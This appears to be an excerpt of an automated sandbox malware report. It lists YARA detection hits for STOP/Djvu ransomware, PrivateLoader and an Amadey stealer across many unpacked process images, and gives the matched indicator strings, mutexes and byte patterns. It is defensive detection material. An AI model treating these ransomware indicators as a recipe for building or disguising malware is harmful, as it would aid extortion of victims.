6.2.759F.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
24.2.6C74.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
24.2.6C74.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
24.2.6C74.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
24.2.6C74.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
28.2.E8B1.exe.28f15a0.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
28.2.E8B1.exe.28f15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
28.2.E8B1.exe.28f15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
28.2.E8B1.exe.28f15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
28.2.E8B1.exe.28f15a0.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
28.2.E8B1.exe.28f15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
28.2.E8B1.exe.28f15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
28.2.E8B1.exe.28f15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
21.2.6C74.exe.23315a0.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
21.2.6C74.exe.23315a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
21.2.6C74.exe.23315a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
21.2.6C74.exe.23315a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
31.2.6000.exe.22815a0.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
31.2.6000.exe.22815a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
31.2.6000.exe.22815a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
31.2.6000.exe.22815a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
33.2.6000.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
33.2.6000.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
33.2.6000.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
33.2.6000.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
30.2.759F.exe.22d15a0.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
30.2.759F.exe.22d15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
30.2.759F.exe.22d15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
30.2.759F.exe.22d15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
26.2.9B15.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
26.2.9B15.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
26.2.9B15.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
26.2.9B15.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
29.2.E8B1.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
29.2.E8B1.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
29.2.E8B1.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
29.2.E8B1.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
40.2.D5B9.exe.4377990.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
12.2.6C74.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
12.2.6C74.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
12.2.6C74.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
12.2.6C74.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
26.2.9B15.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
26.2.9B15.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
26.2.9B15.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
26.2.9B15.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
24.2.6C74.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
24.2.6C74.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
24.2.6C74.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
24.2.6C74.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
16.2.759F.exe.22515a0.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
16.2.759F.exe.22515a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
16.2.759F.exe.22515a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.2.759F.exe.22515a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
12.2.6C74.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
12.2.6C74.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
12.2.6C74.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
12.2.6C74.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
8.2.759F.exe.22f15a0.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
8.2.759F.exe.22f15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.2.759F.exe.22f15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.2.759F.exe.22f15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
32.2.759F.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
32.2.759F.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
32.2.759F.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
32.2.759F.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
14.2.759F.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
14.2.759F.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
14.2.759F.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
14.2.759F.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
31.2.6000.exe.22815a0.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
31.2.6000.exe.22815a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
31.2.6000.exe.22815a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
31.2.6000.exe.22815a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
10.2.6C74.exe.23315a0.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
10.2.6C74.exe.23315a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.6C74.exe.23315a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.6C74.exe.23315a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
27.2.86ED.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
27.2.86ED.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
27.2.86ED.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
27.2.86ED.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
